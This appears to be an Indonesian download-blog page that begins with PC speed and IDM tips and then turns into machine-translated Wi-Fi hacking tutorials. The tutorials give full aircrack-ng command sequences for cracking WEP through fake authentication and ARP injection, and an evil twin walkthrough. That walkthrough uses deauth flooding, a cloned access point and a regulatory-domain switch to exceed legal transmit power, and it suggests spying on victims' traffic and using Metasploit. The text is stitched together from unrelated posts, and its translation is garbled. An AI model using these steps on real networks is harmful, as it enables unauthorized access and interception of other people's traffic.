Halloween Costume ideas 2015

Software, Film dan Artikel Terbaru dan Terpopuler - Menyediakan Software terbaru dan juga pastinya Full Version, Film terbaru yang pasti HD, dan Artikel yang bermanfaat.

Latest Post



    Cara Mempercepat Kinerja Komputer Ampuh – Setiap pengguna komputer pastinya menginginkan komputer yang cepat. Karena komputer yang cepat sedikit banyak akan memberikan pengaruh pada hasil perkerjaan. Jika anda memiliki komputer yang lemot atau lambat, atasi masalah tersebut dengan menggunakan tools yang ada di komputer.

Berikut ini adalah beberapa tips bagaimana mempercepat kinerja komputer menggunakan beberapa tools bawaan, baik itu di Windows XP, Windows Vista, maupun yang paling baru yakni Windows 8.and 10
Penasaran bagaimana caranya? Langsung saja simak ulasan dari 75n1.com berikut ini.


1. Hapus Spyware

Salah satu penyebab komputer menjadi lambat adalah karena adanya spyware, malware, atau virus. Oleh karena itu lakukan pembersihan terhadap malware-malware yang bersarang dalam harddisk komputer anda. Perlu diketahui bahwa spyware tak hanya dapat memperlambat kinerja komputer, namun bisa juga mencuri data-data pribadi anda.

Lakukan pembersihan malware dengan melakukan scan dengan menggunakan tools bawaan Windows seperti Windows Live OneCare. Selain itu anda juga bisa mendownload Microsoft Security Essentials untuk menjaga komputer anda dari ancaman spyware yang dapat menyerang kapan saja.

2. Maksimalkan Kinerja Hard Disk

Harddisk merupakan salah satu komponen komputer yang sangat rawan menyebabkan komputer menjadi lemot. Pasalnya semua data akan tersimpan di hard disk. Untuk menjaga komputer agar tetap cepat, lakukan manajemen data hard disk.

Usahakan agar hard disk masih memiliki cukup banyak ruang kosong. Karena jika hard disk penuh, maka kinerja komputer juga akan menurun. Lakukan pembersihan file-file sampah secara rutin. Anda bisa menggapus file-file sampah menggunakan tools bawaan Windows ataupun aplikasi pihak ketiga.

3. Fragmentasi Disk

Selain membersihkan file-file sampah pada hard disk, anda juga bisa melakukan defrag hard disk. Hal ini bertujuan agar data yang tersimpan dalam hard disk tertata dengan baik. Agar jika suatu saat sistem ingin memanggil data tersebut akan diakses dengan mudah dan cepat.

4. Memperbaiki Bad Sector

Tak hanya pembersihan file sampah dan fragmentasi disk, perlu juga dilakukan perbaikan terhadap bad sector yang terjadi dalam hard disk. Anda bisa melakukan perbaikan bad sector menggunakan tools bawaan yang bernama Error Checking utility. Jika anda pengguna berat komputer, lakukan pengecekan ini setiap sekali dalam seminggu.

5. Maksimalkan RAM

Selain hard disk, RAM yang memiliki peranan penting dalam menentukan cepat tidaknya sebuah komputer. Komputer yang memiliki RAM kecil dan banyak program aplikasi tentunya akan lambat atau lemot. Jika anda ingin membuat kinerja komputer menjadi cepat, tambah kapasitas RAM yang ada di komputer.

6. Sesuaikan Visual Efek

Untuk menjaga performa komputer agar tetap memberikan performa terbaiknya, usahakan untuk menyesuaikan efek visual dengan spesifikasi hardware yang dimiliki komputer. Semakin bagus tampilan visualnya, maka beban yang didapatkan oleh komputer juga semakin berat.




     IDM atau Internet Download Manager adalah sebuah software yang memudahkan para penggunanya dalam mengunduh berbagai macam jenis file. Selain meningkatkan kecepatan unduh berkali-kali lipat, IDM juga memudahkan pengguna dalam mengunduh file video di YouTube. Bahkan software ini bisa membagi antara video dan audio dengan berbagai jenis format, sehingga memudahkan pengguna dalam memilih apa yang benar-benar dibutuhkan.

Meski begitu saat ini IDM atau bahkan software download manager lainnya sedang mengalami masalah tombol unduh yang tidak keluar. Khususnya hal ini terjadi pada beberapa situs besar, termasuk juga YouTube dan browser yang paling bermasalah adalah Chrome.


Hal tersebut disebabkan oleh banyak faktor. Namun kabar paling meyakinkan adalah karena adanya perubahan sistem di dalam browser Google Chrome yang menyebabkan tombol IDM tidak muncul di YouTube. Untuk itu dalam pembahasan kali ini Anda akan diajak untuk mengetahui solusi yang bisa dicoba agar tombol IDM dapat muncul di YouTube.

Melakukan pengaturan plugin

Hal ini bisa dilakukan oleh semua jenis browser. Namun sebagai contoh, saat ini kita akan menggunakan browser Chrome. Anda bisa menyesuaikannya dengan browser yang digunakan, entah itu Mozilla ataupun IE.
Pertama-tama buka terlebih dahulu software Internet Download Manager (IDM)
Selanjutnya buka Configuration, lalu pilih tab General.
Sekarang Anda disuguhkan oleh daftar browser.
Centang browser yang ingin tombol IDM tampil di sana. Misalnya saja browser Google Chrome. Jangan lupa sebelum mencentang browser yang dipilih, centang terlebih dahulu opsi “use advanced browser integration”.
Dengan cara ini nantinya IDM akan dengan paksa menyesuaikan tombol unduh mereka dengan browser yang Anda pilih.
Selanjutnya kita akan memberikan akses plugin IDM pada browser.
Buka browser Anda, dalam contoh ini adalah Chrome. Selanjutnya buka tab extensions. Anda bisa mengaksesnya dengan masuk ke “chrome://extensions” atau melalui menu pengaturan dengan ikon gerigi di pojok kanan atas.
Pada umumnya plugin IDM sudah ada di daftar extensions. Anda hanya perlu mencentang opsi “Allow in incognito” dan centang pula opsi “Enable” di bilah kanan.
Jika belum memiliki plugin IDM Anda bisa mengunduhnya terlebih dahulu.

Unduh: https://chrome.google.com/webstore/search/idm%20integration?hl=en-US
Jika cara di atas masih belum bisa, sebaiknya hapus terlebih dahulu plugin pada tab extensions dengan menekan ikon tong sampah.
Selanjutnya masuk ke My Computer atau This PC. Setelah itu klik local disk C > Program Files > Internet Download Manager. Jika tidak ada mungkin Anda bisa memilih Program Files (x86) atau yang sejenisnya.
Selanjutnya lihat apakah ada file bernama “IDMGCExt.crx”.
Jika ada maka drag file tersebut ke bilah extensions di Chrome.
Nantinya Chrome secara otomatis akan melakukan instalasi file tersebut.

Sampai sini seharusnya tombol IDM sudah muncul pada website YouTube. Namun jika masih belum bisa, sebaiknya gunakan terlebih dahulu pihak ketika, semisal en.savefrom.net.

Incoming search terms:Aplikasi video downloader untuk hp seluleridm tidak menampilkan dialog unduh

More from my site T.I Sniper




      Sebenarnya tidak terlalu sulit sebelum anda melakukan cara setting idm agar download cepat anda bisa mencoba cara yang paling mudah untuk mempercepat download adalah dengan mempercepat koneksi internet. Beberapa Tutorial yang bisa anda coba adalah :

Jika anda suka mebaca 2 trik internet di atas anda selanjutnya bisa mencoba cara setting idm supaya download lebih cepat. Saya akan langsung share  cara setting idm super cepat .

Berikut ini adalah  cara setting idm biar cepat :
cara mempercepat download idm dengan regedit

Beberapa langkah di bawah ini :
1. buka program run lewat cara tekan Tombol windows+R lantas isikan regedit click ok,




2. tentukan HKEY_CURENT_USER—Software—Download Manager



3. saksikan tab kanan cari—Conection Speed
4. lantas click kanan tentukan modify
5. isikan dengan angka 99999999



6. lantas click ok serta exit dari Registry editor
cara mempercepat download idm dengan software.
Silahkan Download IDM OPTIMASION dengan cara free serta Legal Disini
Setelah itu anda instal programnya serta lakukan
Lantas click OptimizeIDM!
#Cara Setting untuk IDM Mempercepat Download IDM
Lakukan/buka Software IDM
Lantas Buka Menu download—options



tentukan tab Conection lantas pada Conection speed ganti jadi Lan10MBs



Default max. number ganti jadi 16klik ok

Ini merupakkan cara ke 4 untuk mempercepat IDM yaitu menggunakkan proxy
cara mempercepat download di idm dengan proxy






Semoga bermanfaat






Bahan yang hilang


Ini tidak bekerja! Diikuti tutorial yang benar dari baris pertama hingga yang terakhir. Melakukan segala sesuatu yang dikatakan, tapi masih tidak mendapatkan apa yang Anda cari? Percayalah, itu seharusnya menjadi seperti itu. Langkah demi langkah eksekusi kode pada cli tidak apa yang diperlukan untuk menjadi seorang hacker. Setiap adaptor nirkabel, sistem komputer, sistem operasi, dan jaringan nirkabel berbeda. Tidak ada seperangkat tetap kode yang terikat untuk bekerja dengan semua wifi pada semua mesin. Hacking adalah seperti matematika. Mengetahui formula bukan berarti Anda bisa menyelesaikan semua masalah, dan melihat solusi dari satu masalah pasti tidak akan membantu Anda dengan satu sama lain. Jadi, ketika Anda hacking jaringan wifi WEP, apa yang Anda benar-benar lakukan?



Apa yang teman-teman lakukan? Pertama, ente menangkap paket bahwa jaringan wifi ... seperti membuang di udara. Satu-satunya tujuan dari paket tersebut adalah untuk menunjukkan kehadirannya. Airodump hanya membutuhkan semua paket yang datang jalan dan mengumpulkan mereka. Paket ini biasanya mengandung beberapa berguna information.Secondly, Anda menggunakan sebuah program untuk mengekstrak password dari paket data yang diambil.


Bagaimana Anda melakukannya?
Sekarang, pertama, kita melakukan sesuatu tidak sepenuhnya diperlukan. Kami mengaktifkan mode monitor. Its seperti menciptakan antarmuka virtual yang akan Anda gunakan semata-mata untuk memantau tujuan. Sekarang tugas ini dicapai saya menggunakan airmon-ng dan antarmuka baru yang disebut mon0.
Kedua, kita menggunakan airodump-ng untuk menangkap paket dari mon0 dan menyimpannya dalam sebuah file. Akhirnya, kita menggunakan aircrack-ng untuk menggunakan data dalam file dump untuk mengekstrak password.


Masalah apa yang akan Anda hadapi?
Sebagian besar waktu, saya telah melihat pemula tidak dapat mengkonfigurasi mesin mereka benar untuk keadaan di mana mereka dapat menjalankan perintah. Untuk ini, melihat tutorials.I lainnya mengasumsikan Anda memiliki Kali sepenuhnya setup dan berjalan baik dan menerima kartu nirkabel Anda. Jadi masalah-yang

Tidak paket data yang cukup.
Tidak WEP dienkripsi. (yaitu WPA atau WPA-2)
Tersembunyi
Sekarang dua masalah terakhir akan dibahas dalam tutorial yang akan datang. Masalah pertama adalah sangat umum dan tidak ada cara mudah untuk mengatasinya. Anda hanya dapat mencoba untuk mempercepat laju data capture. Ada banyak cara untuk melakukan itu. Banyak tergantung pada seberapa jauh Anda dari jaringan. Saya menulis tutorial lengkap untuk ini. Tapi ingat, hacking membutuhkan kesabaran. Kau akan membutuhkannya ketika Anda sampai ke tingkat yang lebih tinggi di mana Anda akan bruteforce jaringan untuk password.
Untuk saat ini, di sini adalah tutorial yang bagus untuk mendapatkan paket data yang cepat.






Untuk mulai dengan, saya akan membahas pertanyaan umum yang diminta pada posting saya sebelumnya.

saya tidak bisa menemukan wlan apapun ketika saya menulis ifconfig di terminal

Apakah teman menggunakan Kali Linux pada mesin virtual. Harap dicatat bahwa adaptor nirkabel hanya bisa digunakan oleh satu mesin pada satu waktu. Mesin host Anda memiliki akses ke adaptor nirkabel, bukan mesin virtual. Pertanyaan ini telah dibahas panjang lebar di forum superuser. Kesimpulannya adalah bahwa Anda tidak dapat langsung menghubungkan kartu wifi internal yang menggunakan mesin virtual dengan peranti lunak
"Sayangnya tidak ada software virtualisasi memungkinkan untuk akses langsung ke perangkat keras seperti itu.


Bandingkan VirtualBox dengan VMware Fusion dan Parallels untuk Mac. Semua 3 dari program-program berperilaku dengan cara yang sama. Satu-satunya perangkat yang dapat langsung diakses adalah perangkat usb. Segala sesuatu yang lain disarikan meskipun mesin virtualisasi. (Meskipun Anda bisa berpendapat bahwa vm memiliki akses tingkat yang lebih rendah ke perangkat cd rom dan penyimpanan).


Aku berharap aku bisa memberikan jawaban yang lebih baik, daripada hanya membeli kartu usb nirkabel. "
Pada dasarnya Anda harus membeli kartu nirkabel eksternal. Mereka tidak sangat mahal. Saya pribadi menggunakan dua dari mereka sendiri. 

Sekarang jika Anda telah mengikuti WEP dasar hacker tutorial, dan juga telah membaca buku pemecahan masalah dasar, maka Anda siap untuk melanjutkan ke tahap di mana Anda mengikuti menengah tingkat hack tutorial. Dalam tutorial ini, kita akan melihat detail yang rumit dari apa yang terjadi dan pendekatan metode yang rumit dan konsep.





Jadi pada dasarnya Anda memiliki 2 pilihan. Pertama, Anda dapat membeli adaptor nirkabel eksternal baru (tidak ada link referral di sini). Kedua, Anda dapat menginstal sisi Kali dengan Windows atau menjalankannya melalui USB. Sebuah mesin virtual hanya dapat menggunakan perangkat keras komputer jika eksternal terhubung melalui USB. Sekarang ada menangkap lain di sini. Adapter internal hampir semua dari mereka, tidak mendukung injeksi. Hal ini sangat penting untuk mempercepat wireless hacking. Jadi, jika Anda benar-benar ingin pergi secara mendalam hacking wireless, maka waktu untuk membeli adaptor eksternal atau dua (lebih banyak lebih baik). Jika itu bukan kemungkinan, Anda mungkin ingin menghabiskan berjam-jam mencoba untuk mendapatkan driver yang mungkin membuat injeksi dukungan adapter internal Anda (saya tidak tahu siapa saja yang berhasil dalam hal ini, tapi mungkin mungkin).

Kali Linux
Saya tidak tahu mengapa hal itu perlu disebutkan di sini, tapi tetap saja, jika Anda tidak memiliki Kali Linux (atau Backtrack) dipasang belum, Anda harus menginstalnya sebelum Anda dapat mulai tutorial ini. Berikut adalah tutorial tentang Kali Linux hacking.
Periksa Injection Dukungan


Aircrack-ng memiliki artikel yang komprehensif terkait dengan memeriksa dukungan injeksi. teman mungkin memeriksa situs web mereka untuk itu. Saya hanya memberikan perintah yang akan cukup untuk mengetahui apakah injeksi bekerja atau tidak.
airmon-ng start wlan0 [atau wlan1] (Menempatkan adaptor nirkabel Anda dalam mode monitor. Dari sekarang kita akan lihat wlan0 / wlan1 sebagai mon0

airserv-ng mon0 -d



aireplay-ng -9 127.0.0.1:666


Ini pada dasarnya set up server semacam sementara hal yang menunggu untuk Anda untuk menguji kemampuan injeksi Anda. Perintah kedua benar-benar mencoba untuk menyuntikkan server, dan berhasil. 127.0.0.1 adalah IP yang disediakan untuk loopback. Itu selalu digunakan ketika Anda melakukan beberapa perintah pada diri sendiri. 666 adalah port yang kita gunakan. Sebagian besar waktu, apa yang berikut IP dan usus besar adalah pelabuhan. Bentuk umum adalah agak seperti IP: port. Jadi akhirnya Anda telah memeriksa kemampuan injeksi Anda, dan baris terakhir - "Injeksi bekerja!" harus membawa senyum ke wajah Anda. Jika tidak, Anda harus membeli kartu yang mendukung injeksi, atau melihat beberapa posting forum yang akan membantu Anda mengetahui sesuatu.


Periksa Kekuatan Sinyal
Sementara metode hacking yang dasar dari posting sebelumnya tidak memiliki pembatasan kekuatan yang nyata, Anda perlu secara fisik dekat dengan jalur akses untuk menyuntikkan paket. Ada informasi mengenai hal yang sama dalam sama aircrack-ng tutorial. Sekali lagi, aku akan meringkas apa yang harus Anda lakukan di sini.
Pertama, kita akan menggunakan airodump-ng mon0 untuk melihat daftar jaringan dalam jangkauan. Lihat yang ingin Anda hack.


Airodump-ng daftar jaringan dalam jangkauan.
Sekarang kita akan hack jaringan digisol. Membuat catatan dari BSSID dari jaringan yang ingin Anda hack. Praktek yang baik adalah untuk menyimpan semua informasi yang dikumpulkan dalam editor teks apapun. Kita harus, pada tahap ini, mengambil catatan berikut: -


ESSID - DIGISOL
BSSID - 00: 17: 7C: 22: CB: 80
CH (channel) - 2
Alamat mac dari pengguna asli terhubung ke jaringan:
Interface: wlan1 - disebut sebagai mon0
Anda harus mengumpulkan informasi setara untuk jaringan Anda akan bekerja pada. Kemudian hanya mengubah nilai-nilai setiap kali saya menggunakannya dalam salah satu perintah
Catatan: Kami memerlukan setidaknya satu pengguna (kabel atau nirkabel) yang terhubung ke jaringan dan menggunakannya secara aktif. Alasannya adalah bahwa tutorial ini tergantung pada menerima setidaknya satu ARP paket permintaan dan jika tidak ada klien aktif maka tidak akan pernah ada setiap ARP paket permintaan.


Sekarang, untuk memeriksa apakah kekuatan sinyal akan cukup, kita hanya akan mengeksekusi kode-berikut
airodump-ng [interface] -c [channel]
airodump-ng mon0 -c 2This akan membuat kartu nirkabel hanya membaca paket di saluran tidak ada. 2, di mana jaringan target kami adalah.

Sekarang untuk menguji jaringan, ketik kode-berikut

aireplay-ng --test -e DIGISOL -a 00: 17: 7C: 22: CB: 80 mon0

 

Terakhir kali kami memeriksa apakah kartu nirkabel memiliki kemampuan untuk menyuntikkan paket. Kami diuji di komputer kita sendiri. Kali ini, kami benar-benar disuntikkan paket ke komputer target. Jika ini berhasil, maka itu kabar yang cukup bagus, dan itu berarti bahwa Anda paling mungkin akan dapat hack jaringan ini. Baris terakhir 30/30: 100% menentukan seberapa baik kekuatan sinyal. Persentase yang sangat tinggi adalah pertanda baik, dan 100 sangat ideal.


Paket capture
Sekarang kita telah menjalankan airodump-ng beberapa kali. Namun, kali ini kita akan melewati perintah w yang akan menginstruksikan airodump-ng untuk menyimpan output ke file.
airodump-ng -c [channel] --bssid [BSSID] -w [file_name] [interface]
airodump-ng -c 2 --bssid 00: 17: 7C: 22: CB: 80 -w sampah mon0 Sekarang output akan disimpan dalam file dump-01.cap
Sekarang kita bisa menjaga terminal ini berjalan dan akan terus menyimpan paket. [Dalam tutorial sebelumnya kita lakukan hanya 2 hal, menangkap paket, yaitu langkah ini, dan retak itu, yaitu langkah kita akan lakukan terakhir. Sementara itu membuat pekerjaan kami lebih mudah untuk hanya mengikuti dua langkah, juga membuat proses jauh lebih memakan waktu, karena kita hanya paket pendengar pasif, yang tidak melakukan apa-apa]


Mempercepat Hal Up
Otentikasi palsu
Sekarang untuk mempercepat, kita akan menyuntikkan jaringan. Dengan demikian kita akan mendapatkan paket ARP. Paket ini akan mengisi kolom data capture airodump-ng kami, dan data yang akan membantu kita mendapatkan password. Segera setelah kami memiliki 10.000 paket data, kita bisa mulai mencoba untuk mendapatkan password menggunakan aircrack-ng.
Sekarang untuk membuat AP memperhatikan paket Anda disuntik, Anda juga harus menjadi klien yang terhubung, atau harus berpura-pura menjadi satu. Anda dapat menutupi alamat mac Anda ke salah satu klien sudah terhubung, atau menggunakan fitur otentikasi palsu. Kami akan melakukan yang terakhir. (Jika Anda melihat kesalahan seperti AP pada channel x dan mon0 adalah pada saluran y kemudian pergi ke bagian bawah posting untuk mengatasi masalah)
aireplay-ng -1 0 -e DIGISOL -a 00: 17: 7C: 22: CB: 80 mon0

Dikonfirmasi dan menangkap paket-paket

ARP modus permintaan ulangan
Paket ARP yang Anda terbaik di mendapatkan banyak infus atau data. Tanpa infus Anda tidak dapat hack jaringan. Masukkan kode berikut untuk membuat aireplay-ng mendengarkan AP untuk paket ARP, dan menyuntikkan mereka segera setelah mereka menemukan satu. Ini akan membuat banyak data sangat cepat. Ini adalah langkah ngebut nyata.
aireplay-ng -3 -b [BSSID] mon0
Ini adalah apa kode akhir akan terlihat seperti-
aireplay-ng -3 -b 00: 17: 7C: 22: CB: 80 mon0


Ini adalah apa itu akan terlihat seperti di awal
Sekarang Anda harus menunggu beberapa waktu sampai mendapat permintaan ARP. Begitu mendapat satu, terminal akan semacam meledak. Dan paket data akan mulai mengisi dengan Godspeed. Sekarang ini adalah bagian di mana pengguna aktif pada jaringan mutlak diperlukan.


awal yang lambat


Semuanya mendapat baik saja setelah beberapa waktu
Setelah beberapa waktu aku punya cukup paket untuk memecahkan hampir setiap jaringan


Data diisi sangat cepat


Video ini menunjukkan seberapa cepat infus mengalir setelah injeksi ARP dimulai.
Retak jaringan
Retak jaringan semudah mengetik berikut ke konsol
aircrack-ng name_of_file-01.cap
Dalam kasus kami, perintah akan
aircrack-ng sampah-01.cap

 

Setelah menekan enter, Anda akan memiliki daftar jaringan dan Anda akan diminta untuk memilih salah satu dari mereka untuk hack. Dalam kasus saya hanya ada satu jaringan, jadi saya tidak bisa mendapatkan bahwa layar, atau screenshot. Password retak dalam waktu kurang dari satu detik.


Saya telah kabur keluar password dan beberapa hal acak.
Jadi akhirnya Anda telah memperoleh password dari jaringan Anda mencoba untuk hack.


Penyelesaian masalah
Seseorang mengomentari pos wireless hacking lain. Ini adalah masalah yang dihadapinya.
setiap kali saya mencoba untuk menggunakan aireplay-ng, dengan pilihan, selalu gagal mengatakan mon0 yang ada di saluran -1 dan target adalah di saluran lainnya. Bagaimana saya bisa tetap ini? saya melihat banyak untuk jawaban nyata tapi tidak ada tahu apa ini.
Ini adalah solusi yang mungkin
Oke, coba berikut- yang
1) Ketika Anda memulai mode monitor, tentukan saluran -
penggunaan: airmon-ng [saluran atau frekuensi]
Kode Anda: airmon-ng start wlan0 6
Pengganti 6 dengan saluran diperlukan.
2) Sementara mulai airodump, tentukan saluran
airodump-ng mon0 -c 6

Saya menghadapi masalah ini ketika mon0 saya terus melompat dari satu saluran ke yang lain, dan langkah kedua saja memecahkan masalah saya. Jika Anda airmon-ng menentukan sendiri saluran tetap pada kemauan sendiri, tanpa Anda menentukan itu, maka masalahnya mungkin lebih rumit. Jika langkah di atas tidak memecahkan masalah, lihat di sini - http://ubuntuforums.org/showthread.php?t=1598930



Wifi Hacking - WEP - Suite Kali Linux Aircrack-ng

Baiklah, posting ini ditulis dengan asumsi Anda telah Kali Linux dan berjalan pada komputer Anda. Jika tidak, di sini adalah posting hacking dengan kali linux. Ini akan memberitahu Anda tentang apa Kali Linux, dan bagaimana menggunakannya. Ini akan memandu Anda melalui proses instalasi.
Jadi jika Anda masih mengikuti, maka cukup ikuti langkah-sederhana ini



Pertama, menciptakan jaringan nirkabel untuk retak. Jangan menggunakan metode ini pada orang lain. Ini adalah ilegal. Kemudian dilanjutkan dengan langkah-langkah di bawah ini.
1. Cari tahu nama adaptor nirkabel Anda.


Baiklah, sekarang, komputer Anda memiliki banyak adapter jaringan, sehingga untuk memindai satu, Anda perlu tahu namanya. Jadi pada dasarnya ada hal-hal berikut yang perlu Anda tahu-

lo - loopback. Tidak penting saat ini.
eth - ethernet
wlan - ini adalah apa yang kita inginkan. Catatan akhiran terkait.
Sekarang, untuk melihat semua adapter, jenis ifconfig pada terminal. Lihat hasilnya. Mencatat wlan (0/1/2) adaptor.




2. Aktifkan mode monitor

Sekarang, kita menggunakan alat yang disebut airmon-ng untuk membuat antarmuka virtual yang disebut Sen hanya jenis
airmon-ng start wlan0 antarmuka mon0 Anda akan dibuat.

airmon-ng start wlan0



3. paket Mulai menangkap

Sekarang, kita akan menggunakan airodump-ng untuk menangkap paket di udara. Alat ini mengumpulkan data dari paket nirkabel di udara. Anda akan melihat nama wifi yang ingin Anda hack.
airodump-ng mon0

airodump-ng mon0


4. Simpan paket yang diambil dalam file

Hal ini dapat dicapai dengan memberikan beberapa parameter lebih dengan perintah airodump
airodump-ng mon0 --write name_of_file

airodump-ng mon0 --write name_of_file


Sekarang paket yang diambil akan disimpan dalam name_of_file.cap
Anda harus menunggu sampai Anda memiliki cukup data (10000 minimum)



5. Crack wifi
Jika semua berjalan dengan baik, maka Anda akan duduk di depan komputer Anda, menyeringai, akhirnya Anda punya 10.000 paket (tidak menghentikan capture paket belum). Sekarang, Anda dapat menggunakan aircrack-ng untuk memecahkan sandi. (di terminal baru)

aircrack-ng name_of_file-01.cap 

name_of_file-01.cap aircrack-ng Program ini akan meminta yang wifi retak, jika ada beberapa tersedia. Pilih wifi. Ini akan melakukan tugasnya. Jika password cukup lemah, maka Anda akan mendapatkannya di depan Anda. Jika tidak, program akan memberitahu Anda untuk mendapatkan lebih banyak paket. Program ini akan coba lagi ketika ada 15.000 paket, dan sebagainya.

Catatan: ini tidak akan bekerja dengan WPA-2. Berikut adalah tutorial tentang -
Hacking wpa/wpa-2 wps with reaver on kali linux


Tips: Periksa link ini jika Anda gagal untuk hack jaringan.

Bahan yang hilang

Berikut adalah tutorial relatif canggih yang akan mengharuskan Anda untuk telah melalui tutorial ini serta salah satu bahan hilang. Setelah Anda sudah mendapat gambaran besar, Anda bisa beralih ke hal-hal yang rumit seperti mempercepat wifi hacker.




Evil Twin Tutorial



Prasyarat

Kali Linux
Pengalaman sebelumnya dengan wireless hacking
Anda juga perlu menginstal alat (utils jembatan) yang tidak datang pra-instal di Kali. Bukan masalah besar-
apt-get install bridge-utils
Tujuan
Seluruh proses dapat dipecah ke dalam langkah-berikut

apt-get install bridge-utils

Mencari tahu tentang titik akses (AP) Anda ingin meniru, dan kemudian benar-benar meniru itu (yaitu menciptakan jalur akses lain dengan SSID yang sama dan semuanya). Kami akan menggunakan airmon-ngfor mencari info yang diperlukan tentang jaringan, dan pangkalan udara-ng untuk membuat itu kembar.
Memaksa klien untuk memutuskan sambungan dari AP nyata dan menghubungkan dengan Anda. Kami akan useaireplay-ng untuk deauthenticate klien, dan kekuatan sinyal yang kuat untuk membuatnya terhubung ke jaringan kami.
Memastikan klien tidak menyadari bahwa ia terhubung ke AP palsu. Yang pada dasarnya berarti bahwa kita harus memberikan akses internet kepada klien kami setelah ia telah terhubung ke jaringan nirkabel palsu. Untuk itu kita perlu memiliki akses internet diri kita sendiri, yang dapat dialihkan ke klien keluar.
Bersenang-senang - memonitor lalu lintas dari klien, mungkin hack ke komputer menggunakan metasploit.
PS: Yang pertama adalah 3 tujuan utama, yang terakhir adalah opsional dan bukan merupakan bagian dari serangan kembar jahat seperti itu. Hal ini agak seorang pria di tengah serangan. Kredit gambar: firewalls.com




Pengumpulan Informasi - airmon-ng
Untuk melihat interfaces- nirkabel yang tersedia

iwconfig


Untuk memulai mode monitor pada antarmuka nirkabel yang tersedia (misalnya wlan0) -

airmon-ng start wlan0To paket capture dari udara pada mode monitor antarmuka (mon0)

airodump-ng mon0 Setelah sekitar 30-40 detik, tekan ctrl + c dan meninggalkan terminal seperti. Buka terminal baru.

Untuk memulai mode monitor pada antarmuka nirkabel yang tersedia (misalnya wlan0)

airmon-ng start wlan0

Untuk menangkap paket dari udara pada mode monitor antarmuka (mon0)

 airodump-ng mon0



Membuat kembar
Sekarang kita akan menggunakan pangkalan udara-ng untuk membuat jaringan kembar salah satu jaringan yang muncul dalam daftar airodump-ng. Ingat, Anda harus memiliki klien yang terhubung ke jaringan (client ini akan dipaksa untuk memutuskan sambungan dari jaringan yang terhubung ke kita dan), sehingga memilih jaringan yang sesuai. Sekarang setelah Anda memilih jaringan, mengambil catatan dari itu ESSID dan BSSID. Menggantikan mereka dalam kode-diberikan


pangkalan udara-ng -a <BSSID sini> --essid <ESSID sini> -c <channel sini> <nama antarmuka> Jika Anda menghadapi masalah, kode lebih pendek akan menjadi-


airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>

Jika teman-teman menghadapi masalah, kode lebih pendek akan menjadi-
airbase-ng --essid <name of network> mon0 

pangkalan udara-ng --essid <nama jaringan> mon0


Lepaskan braket sudut (<&>) dan memilih saluran yang Anda inginkan. Juga, BSSID dapat dipilih secara acak juga, dan tidak harus sesuai dengan target. Antarmuka akan mon0 (atau apa pun adalah kartu yang ingin Anda gunakan). Satu-satunya hal yang identik tentang si kembar harus ESSIDs mereka (yang merupakan nama dari jaringan). Namun, lebih baik untuk menyimpan semua parameter yang sama agar terlihat lebih nyata. Setelah Anda selesai memasukkan parameter dan menjalankan perintah, Anda akan melihat pangkalan udara yang ternyata adaptor nirkabel Anda ke jalur akses.
Catatan: Kami akan perlu untuk menyediakan akses internet untuk klien kami pada tahap berikutnya. Pastikan Anda memiliki metode yang menghubungkan ke yang lain bersih dari internet nirkabel, karena kartu Anda akan sibuk bertindak seperti AP, dan tidak akan dapat menyediakan Anda dengan konektivitas internet. Jadi, baik Anda perlu kartu lain, atau broadband / ADSL / 3G / 4G / 2G internet.




Man di tengah serangan: Kredit Pic: owasp.net


aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one

Memberitahu klien untuk tersesat
Sekarang kita harus meminta klien untuk memutuskan sambungan dari AP itu. Kembar kami tidak akan bekerja jika klien terhubung ke jaringan lainnya. Kita perlu memaksa untuk memutuskan sambungan dari jaringan yang nyata dan terhubung ke kembar.
Untuk ini, bagian pertama adalah untuk memaksa untuk memutuskan. Aireplay akan melakukannya untuk kita-
aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negatif-satu


0 spesies waktu internal di mana untuk mengirim permintaan deauth. 0 berarti sangat cepat, 1 berarti mengirim paket setiap 1 detik, 2 berarti paket setiap 2 detik, dan seterusnya. Jika Anda tetap sebagai 0, maka klien Anda akan terputus dalam hitungan detik, sehingga jalankan perintah, dan tekan ctrl + c setelah beberapa detik saja. Perhatikan bahwa deauth dikirim pada siaran, sehingga semua klien (bukan hanya satu) yang terhubung ke jaringan akan memutuskan. Melepaskan klien tertentu juga mungkin.


Bukan yang nyata, tetapi mengapa oneEven palsu setelah terputus dari nyata AP, klien dapat memilih untuk terus mencoba untuk terhubung ke AP yang sama beberapa kali, bukannya mencoba untuk terhubung ke kita. Kita perlu membuat AP kami menonjol, dan untuk itu, kita perlu kekuatan sinyal lebih. Ada 2 cara untuk melakukan itu-


Secara fisik bergerak lebih dekat ke klien.
Kuasa atas kartu nirkabel Anda untuk mengirimkan pada daya lebih. Yang terakhir dapat dilakukan dengan perintah berikut -

iwconfig wlan0 txpower 27

iwconfig wlan0 txpower 27Here 27 adalah kekuatan transmisi dalam dBm. Beberapa kartu tidak dapat mengirimkan pada daya tinggi, dan beberapa dapat mengirimkan pada daya yang sangat tinggi. Kartu alfa biasanya mendukung upto 30dBm, tapi banyak negara tidak mengizinkan kartu untuk mengirimkan pada kekuatan tersebut. Cobalah mengubah 27-30 dan Anda akan melihat apa yang saya maksud. Di Bolivia, namun, Anda dapat mengirimkan pada 30dBm, dan dengan mengubah domain peraturan, kita dapat mengatasi keterbatasan daya.

iw reg mengatur BO
iwconfig wlan0 txpower 30It sangat disarankan untuk tidak melanggar hukum sebagai batas transmisi yang ada karena suatu alasan, dan kekuasaan yang sangat tinggi dapat berbahaya bagi kesehatan (saya tidak punya bukti eksperimental). Namun demikian, klien harus terhubung ke Anda jika kekuatan sinyal Anda lebih kuat dari yang Anda kembar nyata.

Catatan: Jika Anda tidak mendapatkan klien Anda untuk terhubung ke Anda, ada pilihan lain. Anda dapat meninggalkan dia dengan tidak ada pilihan. Jika Anda terus transmisi paket deauth terus (yaitu tidak menekan ctrl + c setelah klien telah terputus), ia akan punya pilihan selain untuk terhubung ke Anda. Namun, ini adalah situasi yang sangat tidak stabil, dan klien akan kembali ke kembar nyata segera karena mendapat kesempatan.



Memberikan palsu akses internet AP
